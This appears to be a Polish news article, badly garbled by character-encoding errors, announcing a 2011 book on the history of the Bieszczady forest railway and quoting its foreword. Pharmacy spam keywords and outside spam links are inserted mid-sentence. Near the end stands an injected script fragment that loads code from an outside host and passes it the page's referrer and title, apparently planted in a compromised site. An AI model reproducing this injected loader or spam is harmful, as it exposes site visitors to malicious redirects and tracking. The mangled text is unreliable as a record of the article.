Nowa ksiAi??A?ka o Bieszczadzkiej Ciuchci


W pierwszych dniach stycznia 2011 roku nakAi??adem Wydawnictwa RUTHENUS ukaA?e siAi?? ksiAi??A?ka ai??zZ dziejA?w Bieszczadzkich Kolejek LeAi??nychai??? autorstwa dr. inA?. Zygmunta Rygla, byAi??ego pracownika RDLP w KroAi??nie.

WIRTUALNA WYCIECZKA: BIESZCZADZKA KOLEJKA – MAJDAN

Autor jeszcze w 2008 roku opracowaAi?? nowy tekst wydawanych wczeAi??niej broszur o tej tematyce, ale, niestety, nie doA?yAi?? juA? momentu ukazania siAi?? nowej publikacji, ktA?ra po raz pierwszy kompleksowo traktuje BieszczadzkAi?? CiuchciAi?? jako obiekt techniki leAi??nej i kulturowy zabytek leAi??nictwa sprzed lat.

EdycjAi?? ksiAi??A?ki wspiera Regionalna Dyrekcja LasA?w PaAi??stwowych w KroAi??nie oraz Polskie Towarzystwo LeAi??ne i Stowarzyszenie InA?ynierA?w i TechnikA?w LeAi??nictwa i Drzewnictwa OddziaAi?? w KroAi??nie. KsiAi??A?ka wydana bAi??dzie w twardej oprawie, w Ai??adnej szacie graficznej, z licznymi mapkami i ilustracjami. We wstAi??pie doAi?? Edward Balwierczak, dyrektor RDLP w KroAi??nie, pisze: ai??zTrudno wyobraziAi?? sobie dzisiejsze Bieszczady bez kolejki leAi??nej, stanowiAi??cej jednAi?? z najwiAi??kszych turystycznych atrakcji tych gA?r. SunAi??ca wzdAi??uA? dolin ciuchcia przywodzi na pamiAi??Ai?? lata, gdy byAi??a ona niezwykle praktycznym Ai??rodkiem transportu, a jednoczeAi??nie stanowiAi??a dla mieszkaAi??cA?w prawdziwe okno na Ai??wiat. MoA?na powiedzieAi??, A?e wAi??aAi??nie kolejka od koAi??ca XIX wieku w sposA?b najbardziej wyraA?ny zmieniaAi??a gospodarcze oblicze tej ziemi. Niestety, jak wiele zdobyczy techniki, ustAi??piAi??a ona pola nowszym Ai??rodkom transportu. Jej likwidacja w latach 90. XX wieku byAi??a wielkim dramatem dla licznych pracownikA?w i ludzi w niej zakochanych. Dlatego z uznaniem trzeba dziAi?? wspominaAi?? te osoby, ktA?re nie pozwoliAi??y zapomnieAi?? o bieszczadzkiej ciuchci i ostatecznie przywrA?ciAi??y jAi?? do A?ycia, nadajAi??c jej wspA?Ai??czeAi??nie turystycznAi?? funkcjAi??ai???.
pills online

ZdjAi??cie z pocz. XX wieku – zaAi??adunek drewna na ciuchciAi?? w okolicy Cisnej. ZawracajAi?? uwagAi?? wylesione stoki.

Historyczny opis kolejek bieszczadzkich to dzieAi??o Zygmunta Rygla purchase zithromax for chlamydia , ale w ksiAi??A?ce znalazAi?? siAi?? teA? rozdziaAi?? na temat kulturowej roli leAi??nego pociAi??gu, opracowany przez Romana ZielonkAi??, zastAi??pcAi?? nadleAi??niczego NadleAi??nictwa Cisna. Wiele teA? wnosi wspA?Ai??czesny opis dziaAi??aAi?? Fundacji BKL autorstwa StanisAi??awa WermiAi??skiego where can i buy lotrisone cream . Na kartach ksiAi??A?ki znajdziemy wiele niepublikowanych dotAi??d zdjAi??Ai?? z zasobA?w archiwalnych Regionalnej Dyrekcji LasA?w PaAi??stwowych w KroAi??nie. Starych fotografii uA?yczyli rA?wnieA? prywatni kolekcjonerzy, pasjonaci kolejek. To sprawia, A?e caAi??oAi??Ai?? ksiAi??A?ki stanowi dzieAi??o wielu osA?b, ale tym samym nadaje jej zupeAi??nie nowego charakteru. Wydawnictwo RUTHENUS przygotowaAi??o dwie wersje okAi??adki, dajAi??c nabywcom moA?liwoAi??Ai?? wyboru. PromocjAi?? publikacji zaplanowano podczas uroczystoAi??ci zakoAi??czenia V Biegu Narciarskiego Szlakiem Bieszczadzkiej Kolejki LeAi??nej, ktA?ry odbAi??dzie siAi?? 8 stycznia 2011 r. BAi??dzie to rA?wnieA? okazja do przypomnienia, A?e Fundacja Bieszczadzkiej Kolejki LeAi??nej koAi??czy wAi??aAi??nie 15 lat.

WIRTUALNA WYCIECZKA: BIESZCZADZKA KOLEJKA – MAJDAN

RDLPs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; http://vmgonline.lt/pilex-online-shopping/ how much cleocin http://laboratoriovehicular.com/spy-phone-spy-app-cell-phone-monitoring/


Napisz komentarz:

"UWAGA! Komentarze niezgodne z regulaminem serwisu nie będą publikowane. Zachęcamy do kulturalnego wyrażania opinii na temat artykułów oraz unikania personalnych ataków słownych."